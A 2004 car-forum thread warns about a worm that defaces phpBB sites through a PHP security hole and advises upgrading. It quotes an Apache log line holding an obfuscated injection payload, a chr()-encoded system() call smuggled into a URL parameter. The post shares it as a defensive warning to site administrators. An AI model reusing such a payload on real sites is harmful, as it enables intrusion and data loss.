 |
 |
|
|||||||
| Titan General Discussion General Discussion about the Nissan Titan. |
 |
|
|
LinkBack | Thread Tools | Rate Thread | Display Modes |
12-21-2004, 04:54 PM
|
#1 (permalink) |
|
Registered User
 iTrader: (0)
Join Date: Dec 2004
Posts: 325
Thanks: 0
Thanked 0 Times in 0 Posts
|
PHP worm just a heads up
this worm can infect some of the web sites out there.
check this link out.....I don't think its a hoax...It supposely will deface forms and cause data loss..... http://www.dslreports.com/forum/rema...4374~mode=flat ****the following Quated by Koitsu****** Recent PHP security hole + worm. If this forum had cross-posting capabilities, I'd be sticking this on the UNIX Forum as well. Some of you may be familiar with the security hole present in PHP versions prior to 5.0.3 (for the 5.x series) and 4.3.10 (for the 4.x series). If not, this post should be enough reason for you to look into it, and upgrade your sites accordingly. A few hours ago, one of my hosted users pointed me to their site, asking me "what was going on", since they had apparently been hacked. I took a look at their page, and sure enough, I was greeted with the following: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD><BODY bgcolor="#000000" text="#FF0000"><H1>This site is defaced!!!</H1><HR><ADDRESS><b>NeverEverNoSanity WebWorm generation 12.</b></ADDRESS></BODY></HTML> Details showed me that the worm actually reiterates through the entire site and literally modifies all .php documents to contain the above HTML. All .php files will become 270 bytes, with the above content. The worm does not do backups of any sort -- your data WILL BE LOST if you are hit by this worm. Thankfully, we do daily backups. Grepping our Apache logs, I managed to find the following, which looked quite suspicious (the forum here will probably chomp this, but it gives some idea of what's going on): 69.72.192.194 - - [20/Dec/2004:16:41:51 -0800] "GET /jeboard/viewtopic.php?p=29123&sid=7c8 *cbbb5e849216e8da69853439fb687&highlight=%2527%252 Esystem(chr(112)%252echr(101)%252echr(114 *)%252echr(108)%252echr(32)%252echr(45)%252echr(10 1)%252echr(32)%252echr(34)%252echr(111)%2 *52echr(112)%252echr(101)%252echr(110)%252echr(32) %252echr(79)%252echr(85)%252echr(84)%252e *chr(44)%252echr(113)%252echr(40)%252echr(62)%252e chr(109)%252echr(49)%252echr(104)%252echr *(111)%252echr(50)%252echr(111)%252echr(102)%252ec hr(41)%252echr(32)%252echr(97)%252echr(11 *0)%252echr(100)%252echr(32)%252echr(112)%252echr( 114)%252echr(105)%252echr(110)%252echr(11 *6)%252echr(32)%252echr(113)%252echr(40)%252echr(7 2)%252echr(89)%252echr(118)%252echr(57)%2 *52echr(112)%252echr(111)%252echr(52)%252echr(122) %252echr(51)%252echr(106)%252echr(106)%25 *2echr(72)%252echr(87)%252echr(97)%252echr(110)%25 2echr(78)%252echr(41)%252echr(34))%252e%2 *527 HTTP/1.0" 200 34847 "http://www.joyelectric.com/jeboard/viewtopic.php?p=29123&sid=7c8c *bbb5e849216e8da69853439fb687&highlight=%2527%252E system(chr(112)%252echr(101)%252echr(114) *%252echr(108)%252echr(32)%252echr(45)%252echr(101 )%252echr(32)%252echr(34)%252echr(111)%25 *2echr(112)%252echr(101)%252echr(110)%252echr(32)% 252echr(79)%252echr(85)%252echr(84)%252ec *hr(44)%252echr(113)%252echr(40)%252echr(62)%252ec hr(109)%252echr(49)%252echr(104)%252echr( *111)%252echr(50)%252echr(111)%252echr(102)%252ech r(41)%252echr(32)%252echr(97)%252echr(110 *)%252echr(100)%252echr(32)%252echr(112)%252echr(1 14)%252echr(105)%252echr(110)%252echr(116 *)%252echr(32)%252echr(113)%252echr(40)%252echr(72 )%252echr(89)%252echr(118)%252echr(57)%25 *2echr(112)%252echr(111)%252echr(52)%252echr(122)% 252echr(51)%252echr(106)%252echr(106)%252 *echr(72)%252echr(87)%252echr(97)%252echr(110)%252 echr(78)%252echr(41)%252echr(34))%252e%25 *27" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"(*) WARNING 1 long line(s) split A Google Web search turned up nothing for "NeverEverNoSanity". Google Groups had a total of 3 or 4 posts about it, with ZERO details. Probably another IRC kiddie invention... *sigh* A friend of mine in Sweden mentioned that in the past few hours he'd seen a couple sites he commonly visited as being hit by the worm in question. Anyways, I'd just like to take a moment to mention this worm here, and state that yes, there is a mass worm going around defacing sites running versions of PHP, excluding the latest-and-greatest. -- Making life hard for others since 1977. Last edited by 4x4creature; 12-21-2004 at 05:00 PM. |
|
|
|
12-21-2004, 07:20 PM
|
#2 (permalink) |
|
Registered User
iTrader: (0)
Join Date: Jul 2004
Posts: 248
Thanks: 0
Thanked 0 Times in 0 Posts
|
suposedly only efects phpbb based systems. TT is running vBulletin Version 3.0.3. The phpbb.com folks have a patch. If any here were think this could hurt their personal computers, don't. It only defaces the webservers that effected phpbb's are running on.
L8
__________________
KC LE OR BT Canteen |
|
|
|
|
«
Previous Thread
|
Next Thread
»
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | Rate This Thread |
Linear Mode
|
|
All times are GMT -7. The time now is 11:23 PM.
SEO by vBSEO 3.2.0